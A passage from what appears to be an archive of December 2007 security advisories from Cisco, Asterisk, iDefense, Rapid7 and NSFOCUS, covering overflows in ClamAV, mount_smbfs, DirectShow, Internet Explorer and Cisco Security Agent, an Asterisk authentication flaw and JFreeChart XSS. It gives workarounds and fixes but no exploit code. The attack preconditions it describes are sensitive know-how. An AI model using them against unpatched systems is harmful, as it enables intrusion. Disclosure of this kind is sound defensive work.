The TCP normalizer performs the following action: for traffic that
passes through the control-plane path, such as packets that require
Layer 7 inspection or management traffic, the FWSM sets the maximum
number of out-of-order packets that can be queued for a TCP
connection to 2 packets. The TCP normalizer is enabled by default
and is not configurable except to enable or disable.

To disable the TCP normalizing function, use the
"no control-point tcp-normalizer" command in global configuration
mode, as shown in the following example.

FWSM# config terminal
FWSM(config)# no control-point tcp-normalizer
FWSM(config)#
FWSM#

Disabling the "control-point tcp-normalizer" will prevent strict
TCP checks, such as detecting out-of-sequence segments and
monitoring TCP options, on the TCP packets received on the Control
Plane for Layer 7 inspection in the FWSM, will not be performed.
The feature should be re-enabled after upgrading to a fixed version
of software.

Obtaining Fixed Software
========================

Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound by
the terms of Cisco's software license terms found at

http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@... or security-alert@... for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.

Customers using Third-party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@...

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.

Exploitation and Public Announcements
=====================================

This issue was first discovered via internal testing at Cisco. There
are no known instances of intentional exploitation of this issue.
However, Cisco has observed data streams that appear to be
unintentionally triggering the vulnerability.

Status of This Notice: INTERIM
==============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

* cust-security-announce@...
* first-teams@...
* bugtraq@...
* vulnwatch@...
* cisco@...
* cisco-nsp@...
* full-disclosure@...
* comp.dcom.sys.cisco@...

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.

Revision History
================

+-----------------------------------------------------------+
| Revision 1.0 | 2007-DECEMBER-19 | Initial public release. |
+-----------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFHaUDv86n/Gc8U/uARAvHcAJ9dYJ4/qb39Ts591wBQc2TQrmZoEQCdFAPK
3jgY7lh9LmnGGhdJtyL/Q04=
=G7ty
-----END PGP SIGNATURE-----

AST-2007-027 - Database matching order permits host-based authentication to be ignored

2007-12-18T12:03:51Z

Asterisk Project Security Advisory - AST-2007-027

+------------------------------------------------------------------------+
| Product | Asterisk |
|--------------------+---------------------------------------------------|
| Summary | Database matching order permits host-based |
| | authentication to be ignored |
|--------------------+---------------------------------------------------|
| Nature of Advisory | Logic error |
|--------------------+---------------------------------------------------|
| Susceptibility | Remote Unauthenticated Sessions |
|--------------------+---------------------------------------------------|
| Severity | Moderate |
|--------------------+---------------------------------------------------|
| Exploits Known | No |
|--------------------+---------------------------------------------------|
| Reported On | October 30, 2007 |
|--------------------+---------------------------------------------------|
| Reported By | Tilghman Lesher <tlesher AT digium DOT com> |
|--------------------+---------------------------------------------------|
| Posted On | December 18, 2007 |
|--------------------+---------------------------------------------------|
| Last Updated On | December 18, 2007 |
|--------------------+---------------------------------------------------|
| Advisory Contact | Tilghman Lesher <tlesher AT digium DOT com> |
|--------------------+---------------------------------------------------|
| CVE Name | CVE-2007-6430 |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Description | Due to the way database-based registrations ("realtime") |
| | are processed, IP addresses are not checked when the |
| | username is correct and there is no password. An |
| | attacker may impersonate any user using host-based |
| | authentication without a secret, simply by guessing the |
| | username of that user. This is limited in scope to |
| | administrators who have set up the registration database |
| | ("realtime") for authentication and are using only |
| | host-based authentication, not passwords. However, both |
| | the SIP and IAX protocols are affected. |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Resolution | As a workaround, administrators may set a password for |
| | all users and peers in their registration "realtime" |
| | database. A fix is included in the newest release of |
| | Asterisk, as provided below. |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.0.x | Not affected |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.2.x | All versions prior to |
| | | 1.2.26 |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.4.x | All versions prior to |
| | | 1.4.16 |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition | A.x.x | Not affected |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition | B.x.x | All versions prior to |
| | | B.2.3.6 |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition | C.x.x | All versions prior to |
| | | C.1.0-beta8 |
|----------------------------+-------------+-----------------------------|
| AsteriskNOW | pre-release | Not affected |
|----------------------------+-------------+-----------------------------|
| Asterisk Appliance | 0.x.x | Not affected |
| Developer Kit | | |
|----------------------------+-------------+-----------------------------|
| s800i (Asterisk Appliance) | 1.0.x | Not affected |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.2.26 |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.4.16 |
|-------------------------------------------+----------------------------|
| Asterisk Business Edition | B.2.3.6 |
|-------------------------------------------+----------------------------|
| Asterisk Business Edition | C.1.0-beta8 |
|-------------------------------------------+----------------------------|
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Links | |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
| http://www.asterisk.org/security |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
| http://downloads.digium.com/pub/security/AST-2007-027.pdf and |
| http://downloads.digium.com/pub/security/AST-2007-027.html |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Revision History |
|------------------------------------------------------------------------|
| Date | Editor | Revisions Made |
|-----------------+------------------------+-----------------------------|
| 2007-12-18 | Tilghman Lesher | Initial Release |
+------------------------------------------------------------------------+

Asterisk Project Security Advisory - AST-2007-027
Copyright (c) 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.

iDefense Security Advisory 12.18.07: ClamAV libclamav MEW PE File Integer Overflow Vulnerability

2007-12-18T10:26:49Z

iDefense Security Advisory 12.18.07
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 18, 2007

I. BACKGROUND

Clam AntiVirus is a multi-platform anti-virus toolkit released under the
GNU Public License. ClamAV is often integrated into e-mail gateways and
used to scan e-mail messages for viruses. PE, or portable executable,
is the executable file format on Microsoft Windows systems. MEW is one
of the many executable packers that is supported by ClamAV. More
information can be found on the vendor's website at the following URL.

http://www.clamav.net/

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Clam
AntiVirus' ClamAV, as included in various vendors' operating system
distributions, allows attackers to execute arbitrary code with the
privileges of the affected process.

The vulnerability exists within the code responsible for parsing PE
files packed with the MEW packer. During unpacking, two untrusted
values are taken directly from the file without being validated. These
values are later used in an arithmetic operation to calculate the size
used to allocate a heap buffer. This calculation can overflow,
resulting in a buffer of insufficient size being allocated. This later
leads to arbitrary areas of memory being overwritten with attacker
supplied data.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the process using libclamav.

In the case of the clamd program, this will result in code execution
with the privileges of the clamav user. Unsuccessful exploitation
results in the clamd process crashing.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in ClamAV
0.91.2. Previous versions may also be affected.

V. WORKAROUND

Disabling the scanning of PE files will prevent exploitation. If using
clamscan, this can be done by running clamscan with the '--no-pe'
option. If using clamdscan, set the 'ScanPE' option in the clamd.conf
file to 'no'.

VI. VENDOR RESPONSE

The ClamAV team has addressed this vulnerability within version 0.92.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5759 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/17/2007 Initial vendor notification
10/18/2007 Initial vendor response
12/18/2007 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

iDefense Security Advisory 12.17.07: Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Vulnerability

2007-12-18T10:25:39Z

iDefense Security Advisory 12.17.07
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 17, 2007

I. BACKGROUND

The mount_smbfs utility is used to mount a remote SMB share locally. It
is installed set-uid root, so as to allow unprivileged users to mount
shares, and is present in a default installation on both the Server and
Desktop versions of Mac OS X. For more information visit the following
URL.

http://developer.apple.com/documentation/Darwin/Reference/ManPages/man8/mount_smbfs.8.html

II. DESCRIPTION

Local exploitation of a stack based buffer overflow vulnerability in
Apple Inc.'s Mac OS X mount_smbfs utility could allow an attacker to
execute arbitrary code with root privileges.

The vulnerability exists in a portion of code responsible for parsing
command line arguments. When processing the -W option, which is used to
specify a workgroup name, the option's argument is copied into a fixed
sized stack buffer without any checks on its length. This leads to a
trivially exploitable stack based buffer overflow.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with root privileges. In order to exploit this vulnerability, an
attacker must have execute permission for the set-uid root mount_smbfs
binary.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Mac OS X
version 10.4.10, on both the Server and Desktop versions. Previous
versions may also be affected.

V. WORKAROUND

Removing the set-uid bit from the mount_smbfs binary will prevent
exploitation. However, non-root users will be unable to use the
program.

VI. VENDOR RESPONSE

Apple addressed this vulnerability within their Mac OS X 2007-009
security update. More information is available at the following URL.

http://docs.info.apple.com/article.html?artnum=307179

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-3876 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

07/16/2007 Initial vendor notification
07/17/2007 Initial vendor response
12/17/2007 Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson of VeriSign iDefense
Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

iDefense Security Advisory 12.11.07: Microsoft DirectX 7 and 8 DirectShow Stack Buffer Overflow Vulnerability

2007-12-12T11:47:20Z

iDefense Security Advisory 12.11.07
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 11, 2007

I. BACKGROUND

Microsoft DirectShow, part of Microsoft DirectX, is used for the capture
and playback of multimedia streams on Microsoft Windows systems.
Synchronized Accessible Media Interchange (SAMI) is a file format
designed by Microsoft Corp. to deliver captions, subtitles, or audio
descriptions synchronized with digital media content.

http://msdn2.microsoft.com/en-us/library/ms783323.aspx

http://msdn2.microsoft.com/en-us/library/bb248347.aspx

II. DESCRIPTION

Remote exploitation of a stack buffer overflow vulnerability in
Microsoft Corp.'s DirectShow could allow an attacker to execute
arbitrary code in the context of the current user.

This vulnerability exists in the DirextShow SAMI parser, which is
implemented in quartz.dll. When the SAMI parser copies parameters into
a stack buffer, it does not properly check the length of the parameter.
As such, parsing a specially crafted SAMI file can cause a stack-based
buffer overflow. This allows an attacker to execute arbitrary code.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary code in the context
of the current user.

In order to exploit this vulnerability, an attacker must persuade a user
to open a malicious SAMI file. This can be accomplished by hosting a
malicious SAMI file on a web site or by sending the malicious file to a
user via e-mail or instant message.

It is important to note that a SAMI file does not necessarily have to
end with a .smi or .sami extension. DirectShow will identify the file
based on the file contents.

If "Web View Content" is enabled in Windows Explorer, which is the
default setting, a single click will open the malicious file in the
preview pane and trigger the vulnerability.

DirectX 9.0c is listed as an optional update for Windows 2000 operating
system in Windows Update site. It is not listed as a critical update.
However, installing this update will remove this vulnerability.

IV. DETECTION

iDefense has confirmed Microsoft DirectX 7.x and Microsoft DirectX 8.x
are vulnerable. Microsoft DirectX 9.0c or newer is not vulnerable.

V. WORKAROUND

To prevent exploitation of this vulnerability, upgrade to DirectX 9.0c
or newer.

If upgrading is not possible, you can prevent access to the vulnerable
code by un-registering quartz.dll as shown below. However, this
workaround will disable image, audio, and video rendering in
DirectX-enabled applications.

C:\> regsvr32 -u %windir%\system32\quartz.dll

VI. VENDOR RESPONSE

Microsoft has addressed this vulnerability within Microsoft Security
Bulletin MS07-064. For more information, consult their bulletin at the
following URL.

http://www.microsoft.com/technet/security/Bulletin/MS07-064.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-3901 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/28/2007 Initial vendor notification
10/09/2007 Initial vendor response
12/11/2007 Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Jun Mao of VeriSign iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

iDefense Security Advisory 12.11.07: Microsoft Internet Explorer JavaScript setExpression Heap Corruption Vulnerability

2007-12-12T11:02:40Z

iDefense Security Advisory 12.11.07
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 11, 2007

I. BACKGROUND

Internet Explorer is a graphical web browser developed by Microsoft
Corp. and included as part of Microsoft Windows since 1995. The
setExpression method is commonly used to assign a JavaScript expression
to a CSS or DHTML object within a web page. For more information, visit
the following URLs.

http://www.microsoft.com/ie/

http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/setexpression.asp

II. DESCRIPTION

Remote exploitation of a heap corruption vulnerability in Microsoft
Corp.'s Internet Explorer web browser allows attackers to execute
arbitrary code in the context of the current user.

The vulnerability lies in the JavaScript setExpression method, which is
implemented in mshtml.dll. When malformed parameters are supplied,
memory can be corrupted in a way that results in Internet Explorer
accessing a previously deleted object. By creating a specially crafted
web page, it is possible for an attacker to control the contents of the
memory pointed to by the released object. This allows an attacker to
execute arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability would allow an attacker to execute
arbitrary code in the context of the user running Internet Explorer.

In order to exploit this vulnerability, an attacker must persuade a user
to render a malicious web page using Internet Explorer. This is usually
accomplished by providing a link to the malicious page in an e-mail or
instant message.

On Windows Vista, Internet Explorer 7 runs in "Protected Mode". Since
"Protected Mode" processes web pages with lower privileges than a
normal user, it lessens the impact of this vulnerability. However, it
does not prevent arbitrary code execution on the affected system.

IV. DETECTION

As of April 5th, 2007, iDefense testing shows that Internet Explorer 6.0
and Internet Explorer 7.0 with all available security patches are
vulnerable. Older versions of Internet Explorer may also be vulnerable.

V. WORKAROUND

Disable Active Scripting (JavaScript) to prevent exploitation of this
issue. Applying this workaround will prevent proper rendering of web
sites that rely on JavaScript.

VI. VENDOR RESPONSE

Microsoft has addressed this vulnerability within Microsoft Security
Bulletin MS07-069. For more information, consult their bulletin at the
following URL.

http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-3902 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/08/2007 Initial vendor notification
05/08/2007 Initial vendor response
12/11/2007 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Peter Vreugdenhil
(security@...).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

R7-0031: JFreeChart Image Map Cross-Site Scripting Vulnerabilities

2007-12-06T14:58:11Z

_______________________________________________________________________
Rapid7 Security Advisory
Visit http://www.rapid7.com/ to download NeXpose,
SC Magazine Winner of Best Vulnerability Management product.
_______________________________________________________________________

Rapid7 Advisory R7-0031
JFreeChart Image Map Cross-Site Scripting Vulnerabilities

Published: Dec 06, 2007
Revision: 1.0
http://www.rapid7.com/advisories/R7-0031.jsp

1. Affected system(s):

KNOWN VULNERABLE:
o JFreeChart 1.0.8

KNOWN FIXED:
o JFreeChart 1.0.8 branch "jfreechart-1.0.8-security"

2. Summary

JFreeChart is a popular Java-based chart library used to generate
charts and graphs of data. The library includes support for
generating HTML image maps, which allow for enhanced interaction of
the chart via hyperlinks bound to shapes specified by coordinates.

Multiple cross-site scripting vulnerabilities exist within the
image map support functionality of JFreeChart which may allow an
attacker to inject arbitrary HTML or JavaScript into any product
or website which uses the library.

3. Vendor status and information

JFreeChart Project
http://sourceforge.net/projects/jfreechart/

The JFreeChart project was notified of this vulnerability on
November 28th, 2007 via their online bug tracking system. The
vulnerability was fixed on December 6th 2007 with a commit
to their SVN repository.

4. Solution

Upgrade to JFreeChart SVN repository revision 682
using branch "jfreechart-1.0.8-security".

See http://jfreechart.svn.sourceforge.net/viewvc/jfreechart/
for details.

5. Detailed analysis

JFreeChart fails to properly escape the following properties of the
generated image map:

o The chart name.
o The chart tool tip text.
o The href attribute for a chart area.
o The shape attribute for a chart area.
o The coords attribute for a chart area.

It is possible to inject custom HTML code into the code generated by
the JFreeChart library. If a web server uses this library to generate
charts from user-supplied data, an attacker could cause other users of
the same website or application to execute arbitrary JavaScript code
when viewing a page containing a chart.

6. Credit

Discovered by Chad Loder of Rapid7.

7. Contact Information

Rapid7, LLC
Email: advisory@...
Web: http://www.rapid7.com
Phone: +1 (617) 247-1717

8. Disclaimer and Copyright

Rapid7, LLC is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES with
regard to this information. Any application or distribution of this
information constitutes acceptance AS IS, at the user's own risk.
This information is subject to change without notice.

This advisory Copyright (C) 2007 Rapid7, LLC. Permission is hereby
granted to redistribute this advisory, providing that no changes are
made and that the copyright notices and disclaimers remain intact.

NSFOCUS SA2007-02 : Cisco Security Agent Remote Buffer Overflow Vulnerability

2007-12-05T21:44:53Z

NSFOCUS Security Advisory (SA2007-02)

Cisco Security Agent Remote Buffer Overflow Vulnerability

Release Date: 2007-12-06

CVE ID: CVE-2007-5580

http://www.nsfocus.com/english/homepage/research/0702.htm

Affected systems & software
===================

Cisco Security Agent for Windows < 4.5.1.672
Cisco Security Agent for Windows < 5.0.0.225
Cisco Security Agent for Windows < 5.1.0.106
Cisco Security Agent for Windows < 5.2.0.238

Unaffected systems & software
===================

Summary
=========

NSFOCUS Security Team discovered a remote buffer overflow vulnerability in
Cisco Security Agent for Windows which allows remote code execution by sending
a malicious SMB request.

Description
============

Cisco Security Agent is a security software agent that provides threat protection
for server and desktop computing systems.

A driver bundled with Cisco Security Agent for Windows does not correctly
check the data length provided by users when processing a SMB packet, which
might trigger a stack buffer overflow in the system kernel. A remote attacker
might cause system with CSA installed to restart or BSOD. By sending carefully
crafted data an attacker might cause remote code execution, thus gains complete
control over the system.

By default CSA allows access to TCP ports 139 and 445. After establishing a
session to TCP ports 139 and 445, an attacker can complete an exploitation
without any authentication simply by sending a single packet.

Cisco Security Agent for Windows version 5.2.0.225 and prior are affected.
Other Cisco software that uses CSA component is also affected.

Workaround
=============

* Restrict access to TCP ports 139 and 445.

Vendor Status
==============

2007.09.27 Informed the vendor
2007.10.23 Vendor confirmed the vulnerability
2007.12.05 Vendor released a security advisory (cisco-sa-20071205-csa) and
related patches.

For more details about the Cisco security advisory, please refer to:
http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml

Additional Information
========================

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5580 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===============

NSFOCUS Security Team

DISCLAIMS
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2007 NSFOCUS. All Rights Reserved. Terms of use.

NSFocus Security Team <security@...>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

Cisco Security Advisory: Cisco Security Agent for Windows System Driver Remote Buffer Overflow Vulnerability

2007-12-05T10:06:57Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Security Agent for Windows System Driver
Remote Buffer Overflow Vulnerability

Advisory ID: cisco-sa-20071205-csa

http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml

Revision 1.0

For Public Release 2007 December 05 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

A buffer overflow vulnerability exists in a system driver used by the
Cisco Security Agent for Microsoft Windows. This buffer overflow can be
exploited remotely and causes corruption of kernel memory, which leads
to a Windows stop error (blue screen) or to arbitrary code execution.

The vulnerability is triggered during processing of a crafted TCP
segment destined to TCP port 139 or 445. These ports are used by the
Microsoft Server Message Block (SMB) protocol.

Cisco has released free software updates that address this
vulnerability.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5580 has
been assigned to this vulnerability.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml.

Affected Products
=================

Vulnerable Products
+------------------

All versions of Cisco Security Agent for Windows, either managed
or standalone, are affected. Agents that are running on Cisco IP
Communications application servers or agents on systems that are running
the Cisco Security Manager are examples of a standalone implementation.

Standalone agents are installed in the following Cisco IP Communications
products:

* Cisco Unified Communications Manager (CallManager)
* Cisco Conference Connection (CCC)
* Emergency Responder
* IPCC Express
* IPCC Enterprise
* IPCC Hosted
* IP Interactive Voice Response (IP IVR)
* IP Queue Manager
* Intelligent Contact Management (ICM)
* Cisco Voice Portal (CVP)
* Cisco Unified Meeting Place
* Cisco Personal Assistant (PA)
* Cisco Unity
* Cisco Unity Connection
* Cisco Unity Bridge
* Cisco Internet Service Node (ISN)

Cisco Security Manager installs a standalone version of Cisco Security
Agent if an agent is not found when Cisco Security Manager is installed,
so systems that are running Cisco Security Manager are also affected by
this vulnerability.

Products Confirmed Not Vulnerable
+--------------------------------

The Cisco Secure Access Control Server (ACS) Solution Engine, also
known as the ACS appliance, integrates a standalone version of Cisco
Security Agent. However, the ACS Solution Engine is not affected by
this vulnerability because by default it blocks incoming traffic to
the affected TCP ports (139 and 445). Additional information is in the
Details section.

Cisco Security Agents that are running on the Solaris and Linux
operating systems are not affected by the vulnerability described in
this advisory.

No other Cisco products are currently known to be affected by this
vulnerability.

Details
=======

Cisco Security Agent is a security software agent that provides threat
protection for server and desktop computing systems. Cisco Security
Agents can be managed by a Management Center for Cisco Security Agents
or can be standalone agents that are not managed by a Cisco Security
Agent Management Center.

Some Cisco products integrate standalone Cisco Security Agents to
protect the products against viruses, worms, and attacks. Examples of
products that integrate standalone Cisco Security Agents include Cisco
IP Communications application servers, the Cisco Secure Access Control
Server (ACS) Solution Engine, and the Cisco Security Manager.

A buffer overflow vulnerability exists in a system driver used by Cisco
Security Agents, whether they are managed or unmanaged. Cisco Security
Agents use this driver by default.

Windows kernel memory becomes corrupted when this buffer is overflowed.
Therefore, exploitation of this vulnerability will lead to a Windows
stop error (kernel panic, or blue screen error), or to arbitrary code
execution. The vulnerability can be exploited remotely via the network.

The vulnerability is triggered when Cisco Security Agent is processing
a crafted TCP segment destined to TCP port 139 or 445. These ports are
used by the Microsoft Server Message Block (SMB) protocol. A TCP session
needs to be established (that is, the TCP three-way handshake needs to
be completed) for the vulnerability to be triggered.

All systems that are running a vulnerable version of Cisco Security
Agent for Windows are affected. This includes Cisco products that
integrate standalone Cisco Security Agents, such as Cisco IP
Communications applications servers and the Cisco Security Manager.
Although the ACS Solution Engine integrates a standalone Cisco Security
Agent, it is not affected because TCP ports 139 and 445 have been
firewalled by the ACS Solution Engine itself. This blocking of traffic
destined to TCP ports 139 and 445 is enabled by default and is not
user-configurable.

This vulnerability is documented in Cisco bug ID CSCsl00618.

The CVE identifier CVE-2007-5580 has been assigned to this
vulnerability.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerability in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided a FAQ to answer additional questions regarding CVSS
at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss.

* Buffer overflow in system driver causes BSOD (CSCsl00618)

